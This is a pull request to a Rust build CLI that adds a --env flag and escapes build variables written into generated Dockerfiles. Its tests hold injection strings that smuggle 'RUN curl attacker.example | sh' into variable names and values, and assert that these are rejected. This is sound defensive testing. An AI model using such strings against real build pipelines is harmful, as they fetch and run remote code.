### PR TITLE
feat: allow passing build env vars with --env

### DIFF
--- a/crates/anybuild-cli/src/args.rs
+++ b/crates/anybuild-cli/src/args.rs
@@ -59,9 +59,9 @@ pub struct ProjectArgs {
     /// App subdirectory relative to the project path.
     #[arg(long)]
     pub subdir: Option<String>,
-    /// Set a build variable, repeatable (`--env KEY=VALUE`).
-    #[arg(long = "env", value_name = "KEY=VALUE", value_parser = parse_env_pair)]
-    pub env: Vec<(String, String)>,
+    /// Set a build variable, repeatable (`--env NAME` or `--env NAME=VALUE`).
+    #[arg(long = "env", value_name = "NAME[=VALUE]", value_parser = parse_env_arg)]
+    pub env: Vec<(String, Option<String>)>,
 }
 
 impl ProjectArgs {
@@ -78,17 +78,19 @@ impl ProjectArgs {
     }
 }
 
-/// Split a `--env` argument, keeping `=` in the value (base64, URLs, JWTs).
-pub fn parse_env_pair(raw: &str) -> Result<(String, String), String> {
-    let (name, value) = raw
-        .split_once('=')
-        .ok_or_else(|| format!("expected KEY=VALUE, got {raw:?}"))?;
+/// Split a `--env` argument into a name and, if one was written inline, a
+/// value. Splits on the first `=` only, so a value keeps its own.
+pub fn parse_env_arg(raw: &str) -> Result<(String, Option<String>), String> {
+    let (name, value) = match raw.split_once('=') {
+        Some((name, value)) => (name, Some(value.to_owned())),
+        None => (raw, None),
+    };
     if !anybuild::is_valid_env_name(name) {
         return Err(format!(
             "invalid environment variable name {name:?}: expected letters, digits and underscores, not starting with a digit"
         ));
     }
-    Ok((name.to_owned(), value.to_owned()))
+    Ok((name.to_owned(), value))
 }
 
 /// Wasmer connection settings shared by `build`, `deploy` (and `auto`
@@ -212,7 +214,7 @@ mod tests {
         let project = ProjectArgs {
             path: "/tmp/project".into(),
             subdir: Some("apps/dashboard".to_owned()),
-            env: vec![("FOO".to_owned(), "bar".to_owned())],
+            env: vec![("FOO".to_owned(), Some("bar".to_owned()))],
         };
 
         let shared = project.shared();
@@ -223,14 +225,19 @@ mod tests {
     }
 
     #[test]
-    fn env_pairs_split_on_the_first_equals_only() {
+    fn env_args_split_on_the_first_equals_only() {
         assert_eq!(
-            parse_env_pair("TOKEN_B64=YWJj=="),
-            Ok(("TOKEN_B64".to_owned(), "YWJj==".to_owned()))
+            parse_env_arg("TOKEN_B64=YWJj=="),
+            Ok(("TOKEN_B64".to_owned(), Some("YWJj==".to_owned())))
         );
-        assert!(parse_env_pair("NO_SEPARATOR").is_err());
-        assert!(parse_env_pair("=orphaned").is_err());
-        assert!(parse_env_pair("HAS SPACES=x").is_err());
-        assert!(parse_env_pair("SAFE value\nRUN curl attacker | sh #=x").is_err());
+        // No `=`: the value is read from the environment, so it stays out of
+        // this process's command line.
+        assert_eq!(
+            parse_env_arg("DATABASE_URL"),
+            Ok(("DATABASE_URL".to_owned(), None))
+        );
+        assert!(parse_env_arg("=orphaned").is_err());
+        assert!(parse_env_arg("HAS SPACES=x").is_err());
+        assert!(parse_env_arg("SAFE value\nRUN curl attacker | sh #=x").is_err());
     }
 }

--- a/crates/anybuild-cli/src/args.rs
+++ b/crates/anybuild-cli/src/args.rs
@@ -8,6 +8,7 @@
 //! additionally flattens the whole of BuildArgs, which is a strict subset
 //! of auto's surface.
 
+use crate::SharedProjectArgs;
 use std::path::PathBuf;
 
 #[derive(clap::ValueEnum, Debug, Clone, Copy, PartialEq, Eq)]
@@ -58,6 +59,36 @@ pub struct ProjectArgs {
     /// App subdirectory relative to the project path.
     #[arg(long)]
     pub subdir: Option<String>,
+    /// Set a build variable, repeatable (`--env KEY=VALUE`).
+    #[arg(long = "env", value_name = "KEY=VALUE", value_parser = parse_env_pair)]
+    pub env: Vec<(String, String)>,
+}
+
+impl ProjectArgs {
+    /// The project selection as a [`SharedProjectArgs`], which is what builds
+    /// the SDK client. Every command goes through here so a new field reaches
+    /// all of them.
+    pub fn shared(&self) -> SharedProjectArgs {
+        SharedProjectArgs {
+            path: self.path.clone(),
+            subdir: self.subdir.clone(),
+            env: self.env.clone(),
+            ..Default::default()
+        }
+    }
+}
+
+/// Split a `--env` argument, keeping `=` in the value (base64, URLs, JWTs).
+pub fn parse_env_pair(raw: &str) -> Result<(String, String), String> {
+    let (name, value) = raw
+        .split_once('=')
+        .ok_or_else(|| format!("expected KEY=VALUE, got {raw:?}"))?;
+    if !anybuild::is_valid_env_name(name) {
+        return Err(format!(
+            "invalid environment variable name {name:?}: expected letters, digits and underscores, not starting with a digit"
+        ));
+    }
+    Ok((name.to_owned(), value.to_owned()))
 }
 
 /// Wasmer connection settings shared by `build`, `deploy` (and `auto`
@@ -170,4 +201,36 @@ pub struct DeployTargetArgs {
     /// Override the name of the Wasmer app (otherwise Wasmer prompts).
     #[arg(long)]
     pub wasmer_app_name: Option<String>,
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn shared_carries_the_whole_project_selection() {
+        let project = ProjectArgs {
+            path: "/tmp/project".into(),
+            subdir: Some("apps/dashboard".to_owned()),
+            env: vec![("FOO".to_owned(), "bar".to_owned())],
+        };
+
+        let shared = project.shared();
+
+        assert_eq!(shared.path, project.path);
+        assert_eq!(shared.subdir, project.subdir);
+        assert_eq!(shared.env, project.env);
+    }
+
+    #[test]
+    fn env_pairs_split_on_the_first_equals_only() {
+        assert_eq!(
+            parse_env_pair("TOKEN_B64=YWJj=="),
+            Ok(("TOKEN_B64".to_owned(), "YWJj==".to_owned()))
+        );
+        assert!(parse_env_pair("NO_SEPARATOR").is_err());
+        assert!(parse_env_pair("=orphaned").is_err());
+        assert!(parse_env_pair("HAS SPACES=x").is_err());
+        assert!(parse_env_pair("SAFE value\nRUN curl attacker | sh #=x").is_err());
+    }
 }

--- a/crates/anybuild-cli/src/commands.rs
+++ b/crates/anybuild-cli/src/commands.rs
@@ -50,6 +50,16 @@ pub(crate) fn client_with_render_options(
         client = client.with_subdir(subdir);
     }
     for (name, value) in &shared.env {
+        // `--env NAME` names a variable to take from our own environment,
+        // which keeps a secret out of the command line that carried the name.
+        let value = match value {
+            Some(value) => value.clone(),
+            None => std::env::var(name).with_context(|| {
+                format!(
+                    "--env {name}: not set in this process's environment; pass --env {name}=VALUE to give it inline"
+                )
+            })?,
+        };
         client = client.with_env(name, value);
     }
     Ok(client)

--- a/crates/anybuild-cli/src/commands.rs
+++ b/crates/anybuild-cli/src/commands.rs
@@ -49,6 +49,9 @@ pub(crate) fn client_with_render_options(
     if let Some(subdir) = &shared.subdir {
         client = client.with_subdir(subdir);
     }
+    for (name, value) in &shared.env {
+        client = client.with_env(name, value);
+    }
     Ok(client)
 }
 

--- a/crates/anybuild-cli/src/commands/auto.rs
+++ b/crates/anybuild-cli/src/commands/auto.rs
@@ -63,13 +63,12 @@ pub fn run(args: AutoArgs) -> Result<()> {
     let mut execution_targets = args.build.targets.clone();
     apply_platform_targets(&mut execution_targets, platform);
     let shared = SharedProjectArgs {
-        path: args.build.project.path.clone(),
-        subdir: args.build.project.subdir.clone(),
         install_command: args.build.install_command.clone(),
         build_command: args.build.build_command.clone(),
         start_command: args.build.start_command.clone(),
         provider: args.build.provider.clone(),
         config: args.build.config.clone(),
+        ..args.build.project.shared()
     };
     let (build_environment, runtime_environment) = execution(
         execution_targets,

--- a/crates/anybuild-cli/src/commands/build.rs
+++ b/crates/anybuild-cli/src/commands/build.rs
@@ -65,13 +65,12 @@ impl BuildArgs {
 pub fn run(args: BuildArgs) -> Result<()> {
     let skip_docker_if_safe = args.effective_skip_docker_if_safe_build();
     let shared = SharedProjectArgs {
-        path: args.project.path,
-        subdir: args.project.subdir,
         install_command: args.install_command,
         build_command: args.build_command,
         start_command: args.start_command,
         provider: args.provider,
         config: args.config,
+        ..args.project.shared()
     };
     let (build_environment, runtime_environment) = execution(
         args.targets,

--- a/crates/anybuild-cli/src/commands/deploy.rs
+++ b/crates/anybuild-cli/src/commands/deploy.rs
@@ -9,7 +9,6 @@ use crate::args::{
     LambdaArchitectureArg, ProjectArgs, WasmerConnArgs,
 };
 use crate::commands::client;
-use crate::SharedProjectArgs;
 
 #[derive(clap::Args, Debug, Clone, Default)]
 pub struct DeployArgs {
@@ -34,11 +33,7 @@ pub struct DeployArgs {
 }
 
 pub fn run(args: DeployArgs) -> Result<()> {
-    let shared = SharedProjectArgs {
-        path: args.project.path,
-        subdir: args.project.subdir,
-        ..Default::default()
-    };
+    let shared = args.project.shared();
     if args.platform != DeploymentPlatformArg::Wasmer && args.target.wasmer_deploy_config.is_some()
     {
         bail!("--wasmer-deploy-config can only be used with --platform=wasmer");

--- a/crates/anybuild-cli/src/commands/run.rs
+++ b/crates/anybuild-cli/src/commands/run.rs
@@ -4,7 +4,6 @@ use anyhow::Result;
 use crate::args::{ExecutionTargetArgs, ProjectArgs, RunSelectionArgs};
 use crate::commands::{client, execution};
 use crate::context::EnvironmentOptions;
-use crate::SharedProjectArgs;
 
 #[derive(clap::Args, Debug, Clone, Default)]
 pub struct RunArgs {
@@ -35,11 +34,7 @@ pub struct RunArgs {
 pub fn run(args: RunArgs) -> Result<()> {
     let start = args.selection.effective_start();
     let after_deploy = args.selection.effective_after_deploy();
-    let shared = SharedProjectArgs {
-        path: args.project.path,
-        subdir: args.project.subdir,
-        ..Default::default()
-    };
+    let shared = args.project.shared();
     let (build_environment, runtime_environment) = execution(
         args.targets,
         EnvironmentOptions {

--- a/crates/anybuild-cli/src/main.rs
+++ b/crates/anybuild-cli/src/main.rs
@@ -49,6 +49,12 @@ struct SharedProjectArgs {
     /// The JSON content to use as input.
     #[arg(long)]
     config: Option<String>,
+    /// Set a build variable, repeatable (`--env KEY=VALUE`).
+    ///
+    /// A containerized build receives these and nothing else; Anybuild does not
+    /// forward its own environment into the build.
+    #[arg(long = "env", value_name = "KEY=VALUE", value_parser = args::parse_env_pair)]
+    env: Vec<(String, String)>,
 }
 
 #[derive(Subcommand)]

--- a/crates/anybuild-cli/src/main.rs
+++ b/crates/anybuild-cli/src/main.rs
@@ -49,12 +49,9 @@ struct SharedProjectArgs {
     /// The JSON content to use as input.
     #[arg(long)]
     config: Option<String>,
-    /// Set a build variable, repeatable (`--env KEY=VALUE`).
-    ///
-    /// A containerized build receives these and nothing else; Anybuild does not
-    /// forward its own environment into the build.
-    #[arg(long = "env", value_name = "KEY=VALUE", value_parser = args::parse_env_pair)]
-    env: Vec<(String, String)>,
+    /// Set a build variable, repeatable (`--env NAME` or `--env NAME=VALUE`).
+    #[arg(long = "env", value_name = "NAME[=VALUE]", value_parser = args::parse_env_arg)]
+    env: Vec<(String, Option<String>)>,
 }
 
 #[derive(Subcommand)]

--- a/crates/anybuild/src/build/docker.rs
+++ b/crates/anybuild/src/build/docker.rs
@@ -111,6 +111,63 @@ ENV PATH=\"/mise/shims:$PATH\"
 RUN curl https://mise.run | sh
 ";
 
+fn environment_contents(
+    operation: &OperationContext,
+    build_env: &IndexMap<String, String>,
+) -> String {
+    let mut contents = String::new();
+    for (name, value) in build_env {
+        if !crate::sdk::is_valid_env_name(name) {
+            operation.emit(crate::event::Event::Diagnostic {
+                level: crate::event::DiagnosticLevel::Warning,
+                message: format!(
+                    "Skipping environment variable {name:?}: a name must be letters, digits and underscores, and cannot start with a digit"
+                ),
+            });
+            continue;
+        }
+        if name == "PATH" {
+            operation.emit(crate::event::Event::Diagnostic {
+                level: crate::event::DiagnosticLevel::Warning,
+                message:
+                    "Ignoring PATH: the build image sets its own; use a plan path step to extend it"
+                        .to_owned(),
+            });
+            continue;
+        }
+        // A newline cannot be carried on a single ENV line.
+        if value.contains('\n') || value.contains('\r') {
+            operation.emit(crate::event::Event::Diagnostic {
+                level: crate::event::DiagnosticLevel::Warning,
+                message: format!(
+                    "Skipping environment variable {name}: values containing line breaks cannot be passed to a Docker build"
+                ),
+            });
+            continue;
+        }
+        contents.push_str(&format!(
+            "ENV {name}=\"{}\"\n",
+            escape_environment_value(value)
+        ));
+    }
+    contents
+}
+
+/// Escape a value for a double-quoted Dockerfile `ENV` instruction.
+///
+/// An unescaped `"` would end the instruction early and let the rest inject
+/// further directives; `$` is escaped so values are taken literally.
+fn escape_environment_value(value: &str) -> String {
+    let mut escaped = String::with_capacity(value.len());
+    for character in value.chars() {
+        if matches!(character, '\\' | '"' | '$') {
+            escaped.push('\\');
+        }
+        escaped.push(character);
+    }
+    escaped
+}
+
 /// Python's `Path.absolute()`: prefix with the cwd, no normalization.
 fn absolute_path(path: &Path) -> PathBuf {
     if path.is_absolute() {
@@ -233,10 +290,12 @@ impl DockerBuildBackend {
     fn dockerfile_contents(
         &self,
         env: &mut IndexMap<String, String>,
+        build_env: &IndexMap<String, String>,
         mounts: &[Mount],
         steps: &[Step],
     ) -> Result<String> {
         let mut docker_file_contents = String::from(DOCKERFILE_HEADER);
+        docker_file_contents.push_str(&environment_contents(&self.operation, build_env));
 
         for mount in mounts {
             docker_file_contents.push_str(&format!(
@@ -377,6 +436,7 @@ impl BuildBackend for DockerBuildBackend {
         &mut self,
         name: &str,
         env: &IndexMap<String, String>,
+        build_env: &IndexMap<String, String>,
         mounts: &[Mount],
         steps: &[Step],
     ) -> Result<()> {
@@ -388,7 +448,7 @@ impl BuildBackend for DockerBuildBackend {
         // dict. The only observable side channel is the runtime PATH,
         // surfaced through `get_runtime_path`.
         let mut env = env.clone();
-        let docker_file_contents = self.dockerfile_contents(&mut env, mounts, steps)?;
+        let docker_file_contents = self.dockerfile_contents(&mut env, build_env, mounts, steps)?;
 
         self.runtime_path = env.get("PATH").cloned();
 
@@ -548,7 +608,7 @@ mod tests {
             .into_iter()
             .collect();
         let contents = backend
-            .dockerfile_contents(&mut env, &mounts, &steps)
+            .dockerfile_contents(&mut env, &IndexMap::new(), &mounts, &steps)
             .unwrap();
 
         assert!(contents.starts_with(
@@ -590,6 +650,142 @@ mod tests {
     }
 
     #[test]
+    fn test_dockerfile_contents_forwards_supplied_build_variables() {
+        let tmp = tempfile::tempdir().unwrap();
+        let backend = backend(tmp.path());
+
+        let build_env: IndexMap<String, String> = [
+            (
+                "PUBLIC_API_URL".to_owned(),
+                "https://api.example".to_owned(),
+            ),
+            ("ANYBUILD_PHP_VERSION".to_owned(), "8.3".to_owned()),
+        ]
+        .into_iter()
+        .collect();
+
+        let contents = backend
+            .dockerfile_contents(&mut IndexMap::new(), &build_env, &[], &[])
+            .unwrap();
+
+        assert!(contents.contains("ENV PUBLIC_API_URL=\"https://api.example\"\n"));
+        assert!(contents.contains("ENV ANYBUILD_PHP_VERSION=\"8.3\"\n"));
+        let env_at = contents.find("ENV PUBLIC_API_URL=").unwrap();
+        assert!(env_at > contents.find("RUN curl https://mise.run | sh").unwrap());
+    }
+
+    #[test]
+    fn test_dockerfile_contents_never_forwards_the_process_environment() {
+        let tmp = tempfile::tempdir().unwrap();
+        let backend = backend(tmp.path());
+
+        let mut process_env: IndexMap<String, String> = [
+            ("GITHUB_TOKEN".to_owned(), "ghp_secret".to_owned()),
+            ("AWS_SECRET_ACCESS_KEY".to_owned(), "aws-secret".to_owned()),
+            ("NPM_TOKEN".to_owned(), "npm-secret".to_owned()),
+            ("HOME".to_owned(), "/home/builder".to_owned()),
+        ]
+        .into_iter()
+        .collect();
+
+        let contents = backend
+            .dockerfile_contents(&mut process_env, &IndexMap::new(), &[], &[])
+            .unwrap();
+
+        for leaked in [
+            "GITHUB_TOKEN",
+            "AWS_SECRET_ACCESS_KEY",
+            "NPM_TOKEN",
+            "HOME=",
+        ] {
+            assert!(
+                !contents.contains(leaked),
+                "{leaked} reached the build:\n{contents}"
+            );
+        }
+    }
+
+    #[test]
+    fn test_dockerfile_contents_rejects_names_that_would_inject_instructions() {
+        let tmp = tempfile::tempdir().unwrap();
+        let backend = backend(tmp.path());
+
+        let build_env: IndexMap<String, String> = [
+            (
+                "SAFE value\nRUN curl attacker.example | sh #".to_owned(),
+                "x".to_owned(),
+            ),
+            ("HAS SPACES".to_owned(), "x".to_owned()),
+            ("9_LEADING_DIGIT".to_owned(), "x".to_owned()),
+            ("".to_owned(), "x".to_owned()),
+            ("KEPT_NAME".to_owned(), "kept".to_owned()),
+        ]
+        .into_iter()
+        .collect();
+
+        let contents = backend
+            .dockerfile_contents(&mut IndexMap::new(), &build_env, &[], &[])
+            .unwrap();
+
+        assert!(!contents.contains("RUN curl attacker.example | sh"));
+        assert!(!contents.contains("HAS SPACES"));
+        assert!(!contents.contains("9_LEADING_DIGIT"));
+        assert!(contents.contains("ENV KEPT_NAME=\"kept\"\n"));
+    }
+
+    /// The plan is authoritative, so its `ENV` line must come last.
+    #[test]
+    fn test_dockerfile_contents_lets_plan_env_override_supplied_variables() {
+        let tmp = tempfile::tempdir().unwrap();
+        let backend = backend(tmp.path());
+
+        let build_env: IndexMap<String, String> =
+            [("NODE_ENV".to_owned(), "development".to_owned())]
+                .into_iter()
+                .collect();
+        let steps = vec![Step::Env(EnvStep {
+            variables: [("NODE_ENV".to_owned(), "production".to_owned())]
+                .into_iter()
+                .collect(),
+        })];
+
+        let contents = backend
+            .dockerfile_contents(&mut IndexMap::new(), &build_env, &[], &steps)
+            .unwrap();
+
+        let supplied = contents.find("ENV NODE_ENV=\"development\"").unwrap();
+        let planned = contents.find("ENV NODE_ENV=production").unwrap();
+        assert!(planned > supplied);
+    }
+
+    #[test]
+    fn test_dockerfile_contents_escapes_supplied_values() {
+        let tmp = tempfile::tempdir().unwrap();
+        let backend = backend(tmp.path());
+
+        let build_env: IndexMap<String, String> = [
+            (
+                "INJECTED".to_owned(),
+                "\"\nRUN curl attacker.example | sh\nENV X=\"".to_owned(),
+            ),
+            ("LITERAL".to_owned(), "cost $PATH \\ backslash".to_owned()),
+            ("PATH".to_owned(), "/attacker/bin".to_owned()),
+        ]
+        .into_iter()
+        .collect();
+
+        let contents = backend
+            .dockerfile_contents(&mut IndexMap::new(), &build_env, &[], &[])
+            .unwrap();
+
+        assert!(!contents.contains("RUN curl attacker.example | sh"));
+        assert!(!contents.contains("ENV INJECTED="));
+        assert!(!contents.contains("/attacker/bin"));
+        assert!(contents.contains("ENV PATH=\"/mise/shims:$PATH\"\n"));
+        assert!(contents.contains("ENV LITERAL=\"cost \\$PATH \\\\ backslash\"\n"));
+    }
+
+    #[test]
     fn test_dockerfile_asset_errors() {
         let tmp = tempfile::tempdir().unwrap();
         std::fs::create_dir_all(tmp.path().join("assets").join("dir")).unwrap();
@@ -598,6 +794,7 @@ mod tests {
 
         let missing = backend.dockerfile_contents(
             &mut env,
+            &IndexMap::new(),
             &[],
             &[Step::Copy(CopyStep {
                 source: "missing.txt".to_owned(),
@@ -614,6 +811,7 @@ mod tests {
 
         let dir = backend.dockerfile_contents(
             &mut env,
+            &IndexMap::new(),
             &[],
             &[Step::Copy(CopyStep {
                 source: "dir".to_owned(),
@@ -637,6 +835,7 @@ mod tests {
         let contents = backend
             .dockerfile_contents(
                 &mut env,
+                &IndexMap::new(),
                 &[],
                 &[Step::Copy(CopyStep {
                     source: "https://example.com/x.tar.gz".to_owned(),

--- a/crates/anybuild/src/build/local.rs
+++ b/crates/anybuild/src/build/local.rs
@@ -450,6 +450,9 @@ impl BuildBackend for LocalBuildBackend {
         &mut self,
         _name: &str,
         env: &IndexMap<String, String>,
+        // Already merged into `env` by `Anybuild::effective_env`, and this
+        // backend runs on the caller's own machine.
+        _build_env: &IndexMap<String, String>,
         mounts: &[Mount],
         steps: &[Step],
     ) -> Result<()> {

--- a/crates/anybuild/src/build/mod.rs
+++ b/crates/anybuild/src/build/mod.rs
@@ -17,6 +17,7 @@ pub trait BuildBackend {
         &mut self,
         name: &str,
         env: &IndexMap<String, String>,
+        build_env: &IndexMap<String, String>,
         mounts: &[Mount],
         steps: &[Step],
     ) -> Result<()>;

--- a/crates/anybuild/src/lib.rs
+++ b/crates/anybuild/src/lib.rs
@@ -25,11 +25,12 @@ pub use event::{
     PackagePhase, ProcessIo, ProcessStream, ProviderDetail, WasmerPackageMapping,
 };
 pub use sdk::{
-    Anybuild, AutoOptions, AutoOutcome, AwsLambdaOptions, BuildEnvironment, BuildOptions,
-    BuildOutcome, CommandOverrides, ConfigDifference, DeployOptions, DeployOutcome, DeployTarget,
-    DeploymentPlatform, DockerOptions, FlyOptions, GenerateOptions, GeneratedAnybuild,
-    GenerationCheck, GenerationCheckStatus, GenerationPolicy, LambdaArchitecture, PlanOptions,
-    ProjectPlan, ProviderConfigSnapshot, RunOptions, RunOutcome, RuntimeEnvironment, WasmerOptions,
+    is_valid_env_name, Anybuild, AutoOptions, AutoOutcome, AwsLambdaOptions, BuildEnvironment,
+    BuildOptions, BuildOutcome, CommandOverrides, ConfigDifference, DeployOptions, DeployOutcome,
+    DeployTarget, DeploymentPlatform, DockerOptions, FlyOptions, GenerateOptions,
+    GeneratedAnybuild, GenerationCheck, GenerationCheckStatus, GenerationPolicy,
+    LambdaArchitecture, PlanOptions, ProjectPlan, ProviderConfigSnapshot, RunOptions, RunOutcome,
+    RuntimeEnvironment, WasmerOptions,
 };
 
 /// Version of the Anybuild SDK and CLI.

--- a/crates/anybuild/src/run/lambda.rs
+++ b/crates/anybuild/src/run/lambda.rs
@@ -145,6 +145,7 @@ mod tests {
             &mut self,
             _name: &str,
             _env: &IndexMap<String, String>,
+            _build_env: &IndexMap<String, String>,
             _mounts: &[Mount],
             _steps: &[Step],
         ) -> Result<()> {

--- a/crates/anybuild/src/run/lambda_zip.rs
+++ b/crates/anybuild/src/run/lambda_zip.rs
@@ -307,6 +307,7 @@ mod tests {
             &mut self,
             _name: &str,
             _env: &IndexMap<String, String>,
+            _build_env: &IndexMap<String, String>,
             _mounts: &[Mount],
             _steps: &[Step],
         ) -> Result<()> {

--- a/crates/anybuild/src/run/wasmer.rs
+++ b/crates/anybuild/src/run/wasmer.rs
@@ -1274,6 +1274,7 @@ mod tests {
             &mut self,
             _name: &str,
             _env: &IndexMap<String, String>,
+            _build_env: &IndexMap<String, String>,
             _mounts: &[Mount],
             _steps: &[Step],
         ) -> Result<()> {

--- a/crates/anybuild/src/sdk.rs
+++ b/crates/anybuild/src/sdk.rs
@@ -363,6 +363,18 @@ pub struct Anybuild {
     reporter: Reporter,
 }
 
+/// Whether a name may be used as a build variable.
+///
+/// Names are rendered into generated build definitions where whitespace is
+/// structural, so only the POSIX shape `[A-Za-z_][A-Za-z0-9_]*` is accepted.
+pub fn is_valid_env_name(name: &str) -> bool {
+    let mut characters = name.chars();
+    characters
+        .next()
+        .is_some_and(|first| first.is_ascii_alphabetic() || first == '_')
+        && characters.all(|character| character.is_ascii_alphanumeric() || character == '_')
+}
+
 impl Anybuild {
     pub fn new(path: impl Into<PathBuf>) -> Self {
         Self {
@@ -705,6 +717,7 @@ impl Anybuild {
             context.build_backend.borrow_mut().build(
                 &context.serve.name,
                 &env,
+                &self.env_overrides,
                 context.serve.mounts.as_deref().unwrap_or(&[]),
                 &build_steps,
             )?;


### PR DESCRIPTION
# Changes
- Docker builds now receive only variables explicitly passed with `--env`
- Environment names and values are validated and safely escaped to prevent malformed Dockerfiles or instruction injection.
- Docker’s own `PATH` remains protected, and variables defined by the build plan still take precedence.
- `build`, `run`, `deploy`, and `auto` now share one consistent path for carrying project settings, preventing accepted flags from being silently dropped.
- The SDK exposes the same behavior through `Anybuild::with_env`.
- Added tests